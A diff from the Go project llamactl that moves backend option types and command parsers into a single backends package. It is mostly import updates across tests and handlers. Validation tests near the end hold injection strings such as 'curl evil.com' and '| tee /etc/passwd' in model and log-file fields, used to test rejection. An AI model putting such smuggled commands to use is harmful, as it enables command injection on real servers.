||||||
Nodes: map[string]struct{}{"worker1": {}},
|
Nodes: map[string]struct{}{"worker1": {}},
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
Port: 8080,
|
Port: 8080,
|
||||||
},
|
},
|
||||||
@@ -224,7 +223,7 @@ func TestSetOptions_PreservesNodes(t *testing.T) {
|
|||||||
updatedOptions := &instance.Options{
|
updatedOptions := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
Nodes: map[string]struct{}{"worker2": {}}, // Attempt to change node
|
Nodes: map[string]struct{}{"worker2": {}}, // Attempt to change node
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/new-model.gguf",
|
Model: "/path/to/new-model.gguf",
|
||||||
Port: 8081,
|
Port: 8081,
|
||||||
},
|
},
|
||||||
@@ -266,7 +265,7 @@ func TestGetProxy(t *testing.T) {
|
|||||||
|
|
||||||
options := &instance.Options{
|
options := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Host: "localhost",
|
Host: "localhost",
|
||||||
Port: 8080,
|
Port: 8080,
|
||||||
},
|
},
|
||||||
@@ -321,7 +320,7 @@ func TestMarshalJSON(t *testing.T) {
|
|||||||
|
|
||||||
options := &instance.Options{
|
options := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
Port: 8080,
|
Port: 8080,
|
||||||
},
|
},
|
||||||
@@ -491,7 +490,7 @@ func TestCreateOptionsValidation(t *testing.T) {
|
|||||||
MaxRestarts: tt.maxRestarts,
|
MaxRestarts: tt.maxRestarts,
|
||||||
RestartDelay: tt.restartDelay,
|
RestartDelay: tt.restartDelay,
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
@@ -524,7 +523,7 @@ func TestStatusChangeCallback(t *testing.T) {
|
|||||||
globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"}
|
globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"}
|
||||||
options := &instance.Options{
|
options := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
@@ -590,7 +589,7 @@ func TestSetOptions_NodesPreserved(t *testing.T) {
|
|||||||
options := &instance.Options{
|
options := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
Nodes: tt.initialNodes,
|
Nodes: tt.initialNodes,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
@@ -601,7 +600,7 @@ func TestSetOptions_NodesPreserved(t *testing.T) {
|
|||||||
updateOptions := &instance.Options{
|
updateOptions := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
Nodes: tt.updateNodes,
|
Nodes: tt.updateNodes,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/new-model.gguf",
|
Model: "/path/to/new-model.gguf",
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
@@ -634,7 +633,7 @@ func TestProcessErrorCases(t *testing.T) {
|
|||||||
globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"}
|
globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"}
|
||||||
options := &instance.Options{
|
options := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
@@ -665,7 +664,7 @@ func TestRemoteInstanceOperations(t *testing.T) {
|
|||||||
options := &instance.Options{
|
options := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
Nodes: map[string]struct{}{"remote-node": {}}, // Remote instance
|
Nodes: map[string]struct{}{"remote-node": {}}, // Remote instance
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
@@ -709,7 +708,7 @@ func TestProxyClearOnOptionsChange(t *testing.T) {
|
|||||||
globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"}
|
globalSettings := &config.InstancesConfig{LogsDir: "/tmp/test"}
|
||||||
options := &instance.Options{
|
options := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Host: "localhost",
|
Host: "localhost",
|
||||||
Port: 8080,
|
Port: 8080,
|
||||||
},
|
},
|
||||||
@@ -726,7 +725,7 @@ func TestProxyClearOnOptionsChange(t *testing.T) {
|
|||||||
// Update options (should clear proxy)
|
// Update options (should clear proxy)
|
||||||
newOptions := &instance.Options{
|
newOptions := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Host: "localhost",
|
Host: "localhost",
|
||||||
Port: 8081, // Different port
|
Port: 8081, // Different port
|
||||||
},
|
},
|
||||||
@@ -756,7 +755,7 @@ func TestIdleTimeout(t *testing.T) {
|
|||||||
inst := instance.New("test", backendConfig, globalSettings, &instance.Options{
|
inst := instance.New("test", backendConfig, globalSettings, &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
IdleTimeout: &timeout,
|
IdleTimeout: &timeout,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
},
|
},
|
||||||
}, "main", nil)
|
}, "main", nil)
|
||||||
@@ -770,7 +769,7 @@ func TestIdleTimeout(t *testing.T) {
|
|||||||
inst := instance.New("test", backendConfig, globalSettings, &instance.Options{
|
inst := instance.New("test", backendConfig, globalSettings, &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
IdleTimeout: nil, // No timeout
|
IdleTimeout: nil, // No timeout
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
},
|
},
|
||||||
}, "main", nil)
|
}, "main", nil)
|
||||||
@@ -786,7 +785,7 @@ func TestIdleTimeout(t *testing.T) {
|
|||||||
inst := instance.New("test", backendConfig, globalSettings, &instance.Options{
|
inst := instance.New("test", backendConfig, globalSettings, &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
IdleTimeout: &timeout,
|
IdleTimeout: &timeout,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
},
|
},
|
||||||
}, "main", nil)
|
}, "main", nil)
|
||||||
|
|||||||
@@ -4,9 +4,6 @@ import (
|
|||||||
"encoding/json"
|
"encoding/json"
|
||||||
"fmt"
|
"fmt"
|
||||||
"llamactl/pkg/backends"
|
"llamactl/pkg/backends"
|
||||||
"llamactl/pkg/backends/llamacpp"
|
|
||||||
"llamactl/pkg/backends/mlx"
|
|
||||||
"llamactl/pkg/backends/vllm"
|
|
||||||
"llamactl/pkg/config"
|
"llamactl/pkg/config"
|
||||||
"log"
|
"log"
|
||||||
"maps"
|
"maps"
|
||||||
@@ -33,9 +30,9 @@ type Options struct {
|
|||||||
Nodes map[string]struct{} `json:"-"`
|
Nodes map[string]struct{} `json:"-"`
|
||||||
|
|
||||||
// Backend-specific options
|
// Backend-specific options
|
||||||
LlamaServerOptions *llamacpp.LlamaServerOptions `json:"-"`
|
LlamaServerOptions *backends.LlamaServerOptions `json:"-"`
|
||||||
MlxServerOptions *mlx.MlxServerOptions `json:"-"`
|
MlxServerOptions *backends.MlxServerOptions `json:"-"`
|
||||||
VllmServerOptions *vllm.VllmServerOptions `json:"-"`
|
VllmServerOptions *backends.VllmServerOptions `json:"-"`
|
||||||
}
|
}
|
||||||
|
|
||||||
// options wraps Options with thread-safe access (unexported).
|
// options wraps Options with thread-safe access (unexported).
|
||||||
@@ -116,7 +113,7 @@ func (c *Options) UnmarshalJSON(data []byte) error {
|
|||||||
return fmt.Errorf("failed to marshal backend options: %w", err)
|
return fmt.Errorf("failed to marshal backend options: %w", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
c.LlamaServerOptions = &llamacpp.LlamaServerOptions{}
|
c.LlamaServerOptions = &backends.LlamaServerOptions{}
|
||||||
if err := json.Unmarshal(optionsData, c.LlamaServerOptions); err != nil {
|
if err := json.Unmarshal(optionsData, c.LlamaServerOptions); err != nil {
|
||||||
return fmt.Errorf("failed to unmarshal llama.cpp options: %w", err)
|
return fmt.Errorf("failed to unmarshal llama.cpp options: %w", err)
|
||||||
}
|
}
|
||||||
@@ -128,7 +125,7 @@ func (c *Options) UnmarshalJSON(data []byte) error {
|
|||||||
return fmt.Errorf("failed to marshal backend options: %w", err)
|
return fmt.Errorf("failed to marshal backend options: %w", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
c.MlxServerOptions = &mlx.MlxServerOptions{}
|
c.MlxServerOptions = &backends.MlxServerOptions{}
|
||||||
if err := json.Unmarshal(optionsData, c.MlxServerOptions); err != nil {
|
if err := json.Unmarshal(optionsData, c.MlxServerOptions); err != nil {
|
||||||
return fmt.Errorf("failed to unmarshal MLX options: %w", err)
|
return fmt.Errorf("failed to unmarshal MLX options: %w", err)
|
||||||
}
|
}
|
||||||
@@ -140,7 +137,7 @@ func (c *Options) UnmarshalJSON(data []byte) error {
|
|||||||
return fmt.Errorf("failed to marshal backend options: %w", err)
|
return fmt.Errorf("failed to marshal backend options: %w", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
c.VllmServerOptions = &vllm.VllmServerOptions{}
|
c.VllmServerOptions = &backends.VllmServerOptions{}
|
||||||
if err := json.Unmarshal(optionsData, c.VllmServerOptions); err != nil {
|
if err := json.Unmarshal(optionsData, c.VllmServerOptions); err != nil {
|
||||||
return fmt.Errorf("failed to unmarshal vLLM options: %w", err)
|
return fmt.Errorf("failed to unmarshal vLLM options: %w", err)
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -3,7 +3,6 @@ package manager_test
|
|||||||
import (
|
import (
|
||||||
"fmt"
|
"fmt"
|
||||||
"llamactl/pkg/backends"
|
"llamactl/pkg/backends"
|
||||||
"llamactl/pkg/backends/llamacpp"
|
|
||||||
"llamactl/pkg/config"
|
"llamactl/pkg/config"
|
||||||
"llamactl/pkg/instance"
|
"llamactl/pkg/instance"
|
||||||
"llamactl/pkg/manager"
|
"llamactl/pkg/manager"
|
||||||
@@ -72,7 +71,7 @@ func TestPersistence(t *testing.T) {
|
|||||||
manager1 := manager.NewInstanceManager(backendConfig, cfg, map[string]config.NodeConfig{}, "main")
|
manager1 := manager.NewInstanceManager(backendConfig, cfg, map[string]config.NodeConfig{}, "main")
|
||||||
options := &instance.Options{
|
options := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
Port: 8080,
|
Port: 8080,
|
||||||
},
|
},
|
||||||
@@ -134,7 +133,7 @@ func TestConcurrentAccess(t *testing.T) {
|
|||||||
defer wg.Done()
|
defer wg.Done()
|
||||||
options := &instance.Options{
|
options := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
@@ -171,7 +170,7 @@ func TestShutdown(t *testing.T) {
|
|||||||
// Create test instance
|
// Create test instance
|
||||||
options := &instance.Options{
|
options := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
@@ -233,7 +232,7 @@ func TestAutoRestartDisabledInstanceStatus(t *testing.T) {
|
|||||||
options := &instance.Options{
|
options := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
AutoRestart: &autoRestart,
|
AutoRestart: &autoRestart,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
Port: 8080,
|
Port: 8080,
|
||||||
},
|
},
|
||||||
|
|||||||
@@ -2,7 +2,6 @@ package manager_test
|
|||||||
|
|
||||||
import (
|
import (
|
||||||
"llamactl/pkg/backends"
|
"llamactl/pkg/backends"
|
||||||
"llamactl/pkg/backends/llamacpp"
|
|
||||||
"llamactl/pkg/config"
|
"llamactl/pkg/config"
|
||||||
"llamactl/pkg/instance"
|
"llamactl/pkg/instance"
|
||||||
"llamactl/pkg/manager"
|
"llamactl/pkg/manager"
|
||||||
@@ -15,7 +14,7 @@ func TestCreateInstance_Success(t *testing.T) {
|
|||||||
|
|
||||||
options := &instance.Options{
|
options := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
Port: 8080,
|
Port: 8080,
|
||||||
},
|
},
|
||||||
@@ -42,7 +41,7 @@ func TestCreateInstance_ValidationAndLimits(t *testing.T) {
|
|||||||
mngr := createTestManager()
|
mngr := createTestManager()
|
||||||
options := &instance.Options{
|
options := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
@@ -98,7 +97,7 @@ func TestPortManagement(t *testing.T) {
|
|||||||
// Test auto port assignment
|
// Test auto port assignment
|
||||||
options1 := &instance.Options{
|
options1 := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
@@ -116,7 +115,7 @@ func TestPortManagement(t *testing.T) {
|
|||||||
// Test port conflict detection
|
// Test port conflict detection
|
||||||
options2 := &instance.Options{
|
options2 := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model2.gguf",
|
Model: "/path/to/model2.gguf",
|
||||||
Port: port1, // Same port - should conflict
|
Port: port1, // Same port - should conflict
|
||||||
},
|
},
|
||||||
@@ -134,7 +133,7 @@ func TestPortManagement(t *testing.T) {
|
|||||||
specificPort := 8080
|
specificPort := 8080
|
||||||
options3 := &instance.Options{
|
options3 := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
Port: specificPort,
|
Port: specificPort,
|
||||||
},
|
},
|
||||||
@@ -162,7 +161,7 @@ func TestInstanceOperations(t *testing.T) {
|
|||||||
|
|
||||||
options := &instance.Options{
|
options := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
@@ -185,7 +184,7 @@ func TestInstanceOperations(t *testing.T) {
|
|||||||
// Update instance
|
// Update instance
|
||||||
newOptions := &instance.Options{
|
newOptions := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/new-model.gguf",
|
Model: "/path/to/new-model.gguf",
|
||||||
Port: 8081,
|
Port: 8081,
|
||||||
},
|
},
|
||||||
|
|||||||
@@ -2,7 +2,6 @@ package manager_test
|
|||||||
|
|
||||||
import (
|
import (
|
||||||
"llamactl/pkg/backends"
|
"llamactl/pkg/backends"
|
||||||
"llamactl/pkg/backends/llamacpp"
|
|
||||||
"llamactl/pkg/config"
|
"llamactl/pkg/config"
|
||||||
"llamactl/pkg/instance"
|
"llamactl/pkg/instance"
|
||||||
"llamactl/pkg/manager"
|
"llamactl/pkg/manager"
|
||||||
@@ -37,7 +36,7 @@ func TestTimeoutFunctionality(t *testing.T) {
|
|||||||
options := &instance.Options{
|
options := &instance.Options{
|
||||||
IdleTimeout: &idleTimeout,
|
IdleTimeout: &idleTimeout,
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
@@ -86,7 +85,7 @@ func TestTimeoutFunctionality(t *testing.T) {
|
|||||||
// Test that instance without timeout doesn't timeout
|
// Test that instance without timeout doesn't timeout
|
||||||
noTimeoutOptions := &instance.Options{
|
noTimeoutOptions := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model.gguf",
|
Model: "/path/to/model.gguf",
|
||||||
},
|
},
|
||||||
// No IdleTimeout set
|
// No IdleTimeout set
|
||||||
@@ -117,21 +116,21 @@ func TestEvictLRUInstance_Success(t *testing.T) {
|
|||||||
// Create 3 instances with idle timeout enabled (value doesn't matter for LRU logic)
|
// Create 3 instances with idle timeout enabled (value doesn't matter for LRU logic)
|
||||||
options1 := &instance.Options{
|
options1 := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model1.gguf",
|
Model: "/path/to/model1.gguf",
|
||||||
},
|
},
|
||||||
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
|
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
|
||||||
}
|
}
|
||||||
options2 := &instance.Options{
|
options2 := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model2.gguf",
|
Model: "/path/to/model2.gguf",
|
||||||
},
|
},
|
||||||
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
|
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
|
||||||
}
|
}
|
||||||
options3 := &instance.Options{
|
options3 := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "/path/to/model3.gguf",
|
Model: "/path/to/model3.gguf",
|
||||||
},
|
},
|
||||||
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
|
IdleTimeout: func() *int { timeout := 1; return &timeout }(), // Any value > 0
|
||||||
@@ -199,7 +198,7 @@ func TestEvictLRUInstance_NoEligibleInstances(t *testing.T) {
|
|||||||
createInstanceWithTimeout := func(manager manager.InstanceManager, name, model string, timeout *int) *instance.Instance {
|
createInstanceWithTimeout := func(manager manager.InstanceManager, name, model string, timeout *int) *instance.Instance {
|
||||||
options := &instance.Options{
|
options := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: model,
|
Model: model,
|
||||||
},
|
},
|
||||||
IdleTimeout: timeout,
|
IdleTimeout: timeout,
|
||||||
|
|||||||
@@ -4,9 +4,6 @@ import (
|
|||||||
"encoding/json"
|
"encoding/json"
|
||||||
"fmt"
|
"fmt"
|
||||||
"llamactl/pkg/backends"
|
"llamactl/pkg/backends"
|
||||||
"llamactl/pkg/backends/llamacpp"
|
|
||||||
"llamactl/pkg/backends/mlx"
|
|
||||||
"llamactl/pkg/backends/vllm"
|
|
||||||
"llamactl/pkg/instance"
|
"llamactl/pkg/instance"
|
||||||
"net/http"
|
"net/http"
|
||||||
"os/exec"
|
"os/exec"
|
||||||
@@ -130,7 +127,7 @@ func (h *Handler) ParseLlamaCommand() http.HandlerFunc {
|
|||||||
writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
|
writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
llamaOptions, err := llamacpp.ParseLlamaCommand(req.Command)
|
llamaOptions, err := backends.ParseLlamaCommand(req.Command)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
|
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
|
||||||
return
|
return
|
||||||
@@ -179,7 +176,7 @@ func (h *Handler) ParseMlxCommand() http.HandlerFunc {
|
|||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
mlxOptions, err := mlx.ParseMlxCommand(req.Command)
|
mlxOptions, err := backends.ParseMlxCommand(req.Command)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
|
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
|
||||||
return
|
return
|
||||||
@@ -233,7 +230,7 @@ func (h *Handler) ParseVllmCommand() http.HandlerFunc {
|
|||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
vllmOptions, err := vllm.ParseVllmCommand(req.Command)
|
vllmOptions, err := backends.ParseVllmCommand(req.Command)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
|
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
|
||||||
return
|
return
|
||||||
|
|||||||
@@ -2,7 +2,6 @@ package validation_test
|
|||||||
|
|
||||||
import (
|
import (
|
||||||
"llamactl/pkg/backends"
|
"llamactl/pkg/backends"
|
||||||
"llamactl/pkg/backends/llamacpp"
|
|
||||||
"llamactl/pkg/instance"
|
"llamactl/pkg/instance"
|
||||||
"llamactl/pkg/testutil"
|
"llamactl/pkg/testutil"
|
||||||
"llamactl/pkg/validation"
|
"llamactl/pkg/validation"
|
||||||
@@ -85,7 +84,7 @@ func TestValidateInstanceOptions_PortValidation(t *testing.T) {
|
|||||||
t.Run(tt.name, func(t *testing.T) {
|
t.Run(tt.name, func(t *testing.T) {
|
||||||
options := &instance.Options{
|
options := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Port: tt.port,
|
Port: tt.port,
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
@@ -139,7 +138,7 @@ func TestValidateInstanceOptions_StringInjection(t *testing.T) {
|
|||||||
// Test with Model field (string field)
|
// Test with Model field (string field)
|
||||||
options := &instance.Options{
|
options := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: tt.value,
|
Model: tt.value,
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
@@ -177,7 +176,7 @@ func TestValidateInstanceOptions_ArrayInjection(t *testing.T) {
|
|||||||
// Test with Lora field (array field)
|
// Test with Lora field (array field)
|
||||||
options := &instance.Options{
|
options := &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Lora: tt.array,
|
Lora: tt.array,
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
@@ -201,7 +200,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
|||||||
name: "injection in model field",
|
name: "injection in model field",
|
||||||
options: &instance.Options{
|
options: &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "safe.gguf",
|
Model: "safe.gguf",
|
||||||
HFRepo: "microsoft/model; curl evil.com",
|
HFRepo: "microsoft/model; curl evil.com",
|
||||||
},
|
},
|
||||||
@@ -212,7 +211,7 @@ func TestValidateInstanceOptions_MultipleFieldInjection(t *testing.T) {
|
|||||||
name: "injection in log file",
|
name: "injection in log file",
|
||||||
options: &instance.Options{
|
options: &instance.Options{
|
||||||
BackendType: backends.BackendTypeLlamaCpp,
|
BackendType: backends.BackendTypeLlamaCpp,
|
||||||
LlamaServerOptions: &llamacpp.LlamaServerOptions{
|
LlamaServerOptions: &backends.LlamaServerOptions{
|
||||||
Model: "safe.gguf",
|
Model: "safe.gguf",
|
||||||
LogFile: "/tmp/log.txt | tee /etc/passwd",
|
